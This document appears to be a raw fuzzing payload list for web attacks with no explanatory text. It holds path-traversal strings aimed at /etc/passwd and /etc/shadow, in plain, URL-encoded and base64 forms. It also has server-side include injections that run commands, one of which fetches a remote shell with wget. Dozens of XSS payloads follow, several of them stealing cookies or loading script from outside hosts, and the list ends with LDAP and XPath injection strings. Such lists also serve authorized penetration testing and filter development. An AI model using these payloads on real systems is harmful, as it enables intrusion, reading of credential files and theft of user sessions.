..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd | |
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 | |
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd | |
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 | |
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd | |
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 | |
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fshadow%00 | |
L2V0Yy9tYXN0ZXIucGFzc3dk | |
L21hc3Rlci5wYXNzd2Q= | |
ZXRjL3Bhc3N3ZA== | |
ZXRjL3NoYWRvdyUwMA== | |
L2V0Yy9wYXNzd2Q= | |
L2V0Yy9wYXNzd2QlMDA= | |
Li4vZXRjL3Bhc3N3ZA== | |
Li4vZXRjL3Bhc3N3ZCUwMA== | |
Li4vLi4vZXRjL3Bhc3N3ZA== | |
Li4vLi4vZXRjL3Bhc3N3ZCUwMA== | |
Li4vLi4vLi4vZXRjL3Bhc3N3ZA== | |
Li4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== | |
Li4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== | |
Li4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== | |
Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== | |
Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== | |
Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== | |
Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== | |
Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== | |
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== | |
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== | |
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== | |
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== | |
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== | |
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== | |
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== | |
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== | |
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== | |
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== | |
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== | |
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== | |
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== | |
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== | |
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== | |
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== | |
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== | |
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== | |
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== | |
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== | |
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== | |
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== | |
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== | |
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== | |
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== | |
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== | |
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== | |
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== | |
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== | |
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== | |
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3NoYWRvdyUwMA== | |
<pre><!--#exec cmd="ls" --></pre> | |
<pre><!--#echo var="DATE_LOCAL" --> </pre> | |
<pre><!--#exec cmd="whoami"--></pre> | |
<pre><!--#exec cmd="dir" --></pre> | |
<!--#exec cmd="ls" --> | |
<!--#exec cmd="wget http://website.com/dir/shell.txt" --> | |
<!--#exec cmd="/bin/ls /" --> | |
<!--#exec cmd="dir" --> | |
<!--#exec cmd="cd C:\WINDOWS\System32"> | |
<!--#config errmsg="File not found, informs users and password"--> | |
<!--#echo var="DOCUMENT_NAME" --> | |
<!--#echo var="DOCUMENT_URI" --> | |
<!--#config timefmt="A %B %d %Y %r"--> | |
<!--#fsize file="ssi.shtml" --> | |
<!--#include file=?UUUUUUUU...UU?--> | |
<!--#echo var="DATE_LOCAL" --> | |
<!--#exec cmd="whoami"--> | |
<!--#printenv --> | |
<!--#flastmod virtual="echo.html" --> | |
<!--#echo var="auth_type" --> | |
<!--#echo var="http_referer" --> | |
<!--#echo var="content_length" --> | |
<!--#echo var="content_type" --> | |
<!--#echo var="http_accept_encoding" --> | |
<!--#echo var="forwarded" --> | |
<!--#echo var="document_uri" --> | |
<!--#echo var="date_gmt" --> | |
<!--#echo var="date_local" --> | |
<!--#echo var="document_name" --> | |
<!--#echo var="document_root" --> | |
<!--#echo var="from" --> | |
<!--#echo var="gateway_interface" --> | |
<!--#echo var="http_accept" --> | |
<!--#echo var="http_accept_charset" --> | |
<!--#echo var="http_accept_language" --> | |
<!--#echo var="http_connection" --> | |
<!--#echo var="http_cookie" --> | |
<!--#echo var="http_form" --> | |
<!--#echo var="http_host" --> | |
<!--#echo var="user_name" --> | |
<!--#echo var="unique_id" --> | |
<!--#echo var="tz" --> | |
<!--#echo var="total_hits" --> | |
<!--#echo var="server_software" --> | |
<!--#echo var="server_protocol" --> | |
<!--#echo var="server_port" --> | |
<!--#echo var="server_name --> | |
<!--#echo var="server_addr" --> | |
<!--#echo var="server_admin" --> | |
<!--#echo var="script_url" --> | |
<!--#echo var="script_uri" --> | |
<!--#echo var="script_name" --> | |
<!--#echo var="script_filename" --> | |
<!--#echo var="netsite_root" --> | |
<!--#echo var="site_htmlroot" --> | |
<!--#echo var="path_translated" --> | |
<!--#echo var="path_info_translated" --> | |
<!--#echo var="request_uri" --> | |
<!--#echo var="request_method" --> | |
<!--#echo var="remote_user" --> | |
<!--#echo var="remote_addr" --> | |
<!--#echo var="http_client_ip" --> | |
<!--#echo var="remote_port" --> | |
<!--#echo var="remote_ident" --> | |
<!--#echo var="remote_host" --> | |
<!--#echo var="query_string_unescaped" --> | |
<!--#echo var="query_string" --> | |
<!--#echo var="path_translated" --> | |
<!--#echo var="path_info" --> | |
<!--#echo var="path" --> | |
<!--#echo var="page_count" --> | |
<!--#echo var="last_modified" --> | |
<!--#echo var="http_user_agent" --> | |
<!--#echo var="http_ua_os" --> | |
<!--#echo var="http_ua_cpu" --> | |
'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eshadowlabs(0x000045)%3C/script%3E | |
<<scr\0ipt/src=http://xss.com/xss.js></script | |
%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3ERWAR%280x00010E%29%3C%2Fscript%3E | |
' onmouseover=alert(/Black.Spook/) | |
"><iframe%20src="http://google.com"%%203E | |
'<script>window.onload=function(){document.forms[0].message.value='1';}</script> | |
xâ€</title><img src%3dx onerror%3dalert(1)> | |
<script> document.getElementById(%22safe123%22).setCapture(); document.getElementById(%22safe123%22).click(); </script> | |
<script>Object.defineProperties(window, {Safe: {value: {get: function() {return document.cookie}}}});alert(Safe.get())</script> | |
<script>var x = document.createElement('iframe');document.body.appendChild(x);var xhr = x.contentWindow.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();</script> | |
<script>(function() {var event = document.createEvent(%22MouseEvents%22);event.initMouseEvent(%22click%22, true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);var fakeData = [event, {isTrusted: true}, event];arguments.__defineGetter__('0', function() { return fakeData.pop(); });alert(Safe.get.apply(null, arguments));})();</script> | |
<script>var script = document.getElementsByTagName('script')[0]; var clone = script.childNodes[0].cloneNode(true); var ta = document.createElement('textarea'); ta.appendChild(clone); alert(ta.value.match(/cookie = '(.*?)'/)[1])</script> | |
<script>xhr=new ActiveXObject(%22Msxml2.XMLHTTP%22);xhr.open(%22GET%22,%22/xssme2%22,true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();</script> | |
<script>alert(document.documentElement.innerHTML.match(/'([^']%2b)/)[1])</script> | |
<script>alert(document.getElementsByTagName('html')[0].innerHTML.match(/'([^']%2b)/)[1])</script> | |
<%73%63%72%69%70%74> %64 = %64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74(%22%64%69%76%22); %64%2e%61%70%70%65%6e%64%43%68%69%6c%64(%64%6f%63%75%6d%65%6e%74%2e%68%65%61%64%2e%63%6c%6f%6e%65%4e%6f%64%65(%74%72%75%65)); %61%6c%65%72%74(%64%2e%69%6e%6e%65%72%48%54%4d%4c%2e%6d%61%74%63%68(%22%63%6f%6f%6b%69%65 = '(%2e%2a%3f)'%22)[%31]); </%73%63%72%69%70%74> | |
<script> var xdr = new ActiveXObject(%22Microsoft.XMLHTTP%22); xdr.open(%22get%22, %22/xssme2%3Fa=1%22, true); xdr.onreadystatechange = function() { try{ var c; if (c=xdr.responseText.match(/document.cookie = '(.*%3F)'/) ) alert(c[1]); }catch(e){} }; xdr.send(); </script> | |
<iframe id=%22ifra%22 src=%22/%22></iframe> <script>ifr = document.getElementById('ifra'); ifr.contentDocument.write(%22<scr%22 %2b %22ipt>top.foo = Object.defineProperty</scr%22 %2b %22ipt>%22); foo(window, 'Safe', {value:{}}); foo(Safe, 'get', {value:function() { return document.cookie }}); alert(Safe.get());</script> | |
<script>alert(document.head.innerHTML.substr(146,20));</script> | |
<script>alert(document.head.childNodes[3].text)</script> | |
<script>var request = new XMLHttpRequest();request.open('GET', 'http://html5sec.org/xssme2', false);request.send(null);if (request.status == 200){alert(request.responseText.substr(150,41));}</script> | |
<script>Object.defineProperty(window, 'Safe', {value:{}});Object.defineProperty(Safe, 'get', {value:function() {return document.cookie}});alert(Safe.get())</script> | |
<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%22)};document.body.appendChild(x);</script> | |
<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>Object.defineProperty(parent,'Safe',{value:{}});Object.defineProperty(parent.Safe,'get',{value:function(){return top.document.cookie}});alert(parent.Safe.get())<\/script>%22)};document.body.appendChild(x);</script> | |
<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script> | |
<script> document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click({'type':'click','isTrusted':true}); </script> | |
<script> var+MouseEvent=function+MouseEvent(){}; MouseEvent=MouseEvent var+test=new+MouseEvent(); test.isTrusted=true; test.type='click'; document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click(test); </script> | |
<script> (function (o) { function exploit(x) { if (x !== null) alert('User cookie is ' %2B x); else console.log('fail'); } o.onclick = function (e) { e.__defineGetter__('isTrusted', function () { return true; }); exploit(Safe.get()); }; var e = document.createEvent('MouseEvent'); e.initEvent('click', true, true); o.dispatchEvent(e); })(document.getElementById('safe123')); </script> | |
<iframe src=/ onload=eval(unescape(this.name.replace(/\/g,null))) name=fff%253Dnew%2520this.contentWindow.window.XMLHttpRequest%2528%2529%253Bfff.open%2528%2522GET%2522%252C%2522xssme2%2522%2529%253Bfff.onreadystatechange%253Dfunction%2528%2529%257Bif%2520%2528fff.readyState%253D%253D4%2520%2526%2526%2520fff.status%253D%253D200%2529%257Balert%2528fff.responseText%2529%253B%257D%257D%253Bfff.send%2528%2529%253B></iframe> | |
<script> function b() { return Safe.get(); } alert(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true})); </script> | |
<img src=http://www.google.fr/images/srpr/logo3w.png onload=alert(this.ownerDocument.cookie) width=0 height= 0 /> # | |
<script> function foo(elem, doc, text) { elem.onclick = function (e) { e.__defineGetter__(text[0], function () { return true }) alert(Safe.get()); }; var event = doc.createEvent(text[1]); event.initEvent(text[2], true, true); elem.dispatchEvent(event); } </script> <img src=http://www.google.fr/images/srpr/logo3w.png onload=foo(this,this.ownerDocument,this.name.split(/,/)) name=isTrusted,MouseEvent,click width=0 height=0 /> # | |
<SCRIPT+FOR=document+EVENT=onreadystatechange>MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;getElementById(%22safe123%22).click=function()+{alert(Safe.get());};getElementById(%22safe123%22).click(test);</SCRIPT># | |
<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script># | |
<video+onerror='javascript:MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());};document.getElementById(%22safe123%22).click(test);'><source>%23 | |
<script for=document event=onreadystatechange>getElementById('safe123').click()</script> | |
<script> var+x+=+showModelessDialog+(this); alert(x.document.cookie); </script> | |
<script> location.href = 'data:text/html;base64,PHNjcmlwdD54PW5ldyBYTUxIdHRwUmVxdWVzdCgpO3gub3BlbigiR0VUIiwiaHR0cDovL3hzc21lLmh0bWw1c2VjLm9yZy94c3NtZTIvIix0cnVlKTt4Lm9ubG9hZD1mdW5jdGlvbigpIHsgYWxlcnQoeC5yZXNwb25zZVRleHQubWF0Y2goL2RvY3VtZW50LmNvb2tpZSA9ICcoLio/KScvKVsxXSl9O3guc2VuZChudWxsKTs8L3NjcmlwdD4='; </script> | |
<iframe src=%22404%22 onload=%22frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> | |
<iframe src=%22404%22 onload=%22content.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> | |
<iframe src=%22404%22 onload=%22self.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> | |
<iframe src=%22404%22 onload=%22top.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> | |
<script>var x = safe123.onclick;safe123.onclick = function(event) {var f = false;var o = { isTrusted: true };var a = [event, o, event];var get;event.__defineGetter__('type', function() {get = arguments.callee.caller.arguments.callee;return 'click';});var _alert = alert;alert = function() { alert = _alert };x.apply(null, a);(function() {arguments.__defineGetter__('0', function() { return a.pop(); });alert(get());})();};safe123.click();</script># | |
<iframe onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); | |
<textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script> | |
<textarea id=ta onfocus=console.dir(event.currentTarget.ownerDocument.location.href=%26quot;javascript:\%26quot;%26lt;script%26gt;var%2520xhr%2520%253D%2520new%2520XMLHttpRequest()%253Bxhr.open('GET'%252C%2520'http%253A%252F%252Fhtml5sec.org%252Fxssme2'%252C%2520true)%253Bxhr.onload%2520%253D%2520function()%2520%257B%2520alert(xhr.responseText.match(%252Fcookie%2520%253D%2520'(.*%253F)'%252F)%255B1%255D)%2520%257D%253Bxhr.send()%253B%26lt;\/script%26gt;\%26quot;%26quot;) autofocus></textarea> | |
<iframe onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); | |
<textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script> | |
<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe id=iframe src=%22javascript:parent.x(window)%22><iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); | |
<textarea id=ta onfocus=%22write('<script>alert(1)</script>')%22 autofocus></textarea> | |
<object data=%22data:text/html;base64,PHNjcmlwdD4gdmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOyB4aHIub3BlbignR0VUJywgJ2h0dHA6Ly94c3NtZS5odG1sNXNlYy5vcmcveHNzbWUyJywgdHJ1ZSk7IHhoci5vbmxvYWQgPSBmdW5jdGlvbigpIHsgYWxlcnQoeGhyLnJlc3BvbnNlVGV4dC5tYXRjaCgvY29va2llID0gJyguKj8pJy8pWzFdKSB9OyB4aHIuc2VuZCgpOyA8L3NjcmlwdD4=%22> | |
<script>function x(window) { eval(location.hash.substr(1)) }; open(%22javascript:opener.x(window)%22)</script>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); | |
%3Cscript%3Exhr=new%20ActiveXObject%28%22Msxml2.XMLHTTP%22%29;xhr.open%28%22GET%22,%22/xssme2%22,true%29;xhr.onreadystatechange=function%28%29{if%28xhr.readyState==4%26%26xhr.status==200%29{alert%28xhr.responseText.match%28/%27%28[^%27]%2b%29/%29[1]%29}};xhr.send%28%29;%3C/script%3E | |
<iframe src=`http://xssme.html5sec.org/?xss=<iframe onload=%22xhr=new XMLHttpRequest();xhr.open('GET','http://html5sec.org/xssme2',true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();%22>`> | |
<a target="x" href="xssme?xss=%3Cscript%3EaddEventListener%28%22DOMFrameContentLoaded%22,%20function%28e%29%20{e.stopPropagation%28%29;},%20true%29;%3C/script%3E%3Ciframe%20src=%22data:text/html,%253cscript%253eObject.defineProperty%28top,%20%27MyEvent%27,%20{value:%20Object,%20configurable:%20true}%29;function%20y%28%29%20{alert%28top.Safe.get%28%29%29;};event%20=%20new%20Object%28%29;event.type%20=%20%27click%27;event.isTrusted%20=%20true;y%28event%29;%253c/script%253e%22%3E%3C/iframe%3E | |
<a target="x" href="xssme?xss=<script>var cl=Components;var fcc=String.fromCharCode;doc=cl.lookupMethod(top, fcc(100,111,99,117,109,101,110,116) )( );cl.lookupMethod(doc,fcc(119,114,105,116,101))(doc.location.hash)</script>#<iframe src=data:text/html;base64,PHNjcmlwdD5ldmFsKGF0b2IobmFtZSkpPC9zY3JpcHQ%2b name=ZG9jPUNvbXBvbmVudHMubG9va3VwTWV0aG9kKHRvcC50b3AsJ2RvY3VtZW50JykoKTt2YXIgZmlyZU9uVGhpcyA9ICBkb2MuZ2V0RWxlbWVudEJ5SWQoJ3NhZmUxMjMnKTt2YXIgZXZPYmogPSBkb2N1bWVudC5jcmVhdGVFdmVudCgnTW91c2VFdmVudHMnKTtldk9iai5pbml0TW91c2VFdmVudCggJ2NsaWNrJywgdHJ1ZSwgdHJ1ZSwgd2luZG93LCAxLCAxMiwgMzQ1LCA3LCAyMjAsIGZhbHNlLCBmYWxzZSwgdHJ1ZSwgZmFsc2UsIDAsIG51bGwgKTtldk9iai5fX2RlZmluZUdldHRlcl9fKCdpc1RydXN0ZWQnLGZ1bmN0aW9uKCl7cmV0dXJuIHRydWV9KTtmdW5jdGlvbiB4eChjKXtyZXR1cm4gdG9wLlNhZmUuZ2V0KCl9O2FsZXJ0KHh4KGV2T2JqKSk></iframe> | |
<a target="x" href="xssme?xss=<script>find('cookie'); var doc = getSelection().getRangeAt(0).startContainer.ownerDocument; console.log(doc); var xpe = new XPathEvaluator(); var nsResolver = xpe.createNSResolver(doc); var result = xpe.evaluate('//script/text()', doc, nsResolver, 0, null); alert(result.iterateNext().data.match(/cookie = '(.*?)'/)[1])</script> | |
<a target="x" href="xssme?xss=<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe src=%22javascript:parent.x(window);%22></iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', '.', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); | |
Garethy Salty Method!<script>alert(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(this,'window')(),'document')(), 'getElementsByTagName')('html')[0],'innerHTML')().match(/d.*'/));</script> | |
<a href="javascript:\u0061le%72t(1)"><button> | |
<div onmouseover='alert(1)'>DIV</div> | |
<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> | |
<a href="jAvAsCrIpT:alert(1)">X</a> | |
<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> ? | |
<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">? | |
<var onmouseover="prompt(1)">On Mouse Over</var>? | |
<a href=javascript:alert(document.cookie)>Click Here</a> | |
<img src="/" =_=" title="onerror='prompt(1)'"> | |
<%<!--'%><script>alert(1);</script --> | |
<script src="data:text/javascript,alert(1)"></script> | |
<iframe/src \/\/onload = prompt(1) | |
<iframe/onreadystatechange=alert(1) | |
<svg/onload=alert(1) | |
<input value=<><iframe/src=javascript:confirm(1) | |
<input type="text" value=``<div/onmouseover='alert(1)'>X</div> | |
http://www.<script>alert(1)</script .com | |
<iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															%28
																1
																	%29></iframe> ? | |
<svg><script ?>alert(1) | |
<iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe> | |
<img src=`xx:xx`onerror=alert(1)> | |
<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object> | |
<meta http-equiv="refresh" content="0;javascript:alert(1)"/>? | |
<math><a xlink:href="//jsfiddle.net/t846h/">click | |
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>? | |
<svg contentScriptType=text/vbs><script>MsgBox+1 | |
<a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a | |
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> | |
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ | |
<script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F | |
<script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script ???????????? | |
<object data=javascript:\u0061le%72t(1)> | |
<script>+-+-1-+-+alert(1)</script> | |
<body/onload=<!-->
alert(1)> | |
<script itworksinallbrowsers>/*<script* */alert(1)</script ? | |
<img src ?itworksonchrome?\/onerror = alert(1)??? | |
<svg><script>//
confirm(1);</script </svg> | |
<svg><script onlypossibleinopera:-)> alert(1) | |
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe | |
<script x> alert(1) </script 1=2 | |
<div/onmouseover='alert(1)'> style="x:"> | |
<--`<img/src=` onerror=alert(1)> --!> | |
<script/src=data:text/javascript,alert(1)></script> ? | |
<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>? | |
"><img src=x onerror=window.open('https://www.google.com/');> | |
<form><button formaction=javascript:alert(1)>CLICKME | |
<math><a xlink:href="//jsfiddle.net/t846h/">click | |
<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>? | |
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> | |
<a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a> | |
"><img src=x onerror=prompt(1);> | |
* | |
*)(& | |
*))%00 | |
*()|%26' | |
*()|&' | |
*(|(mail=*)) | |
*(|(objectclass=*)) | |
*)(uid=*))(|(uid=* | |
*/* | |
*| | |
/ | |
// | |
//* | |
@* | |
| | |
admin* | |
admin*)((|userpassword=*) | |
admin*)((|userPassword=*) | |
x' or name()='username' or 'x'='y | |
! | |
%21 | |
%26 | |
%28 | |
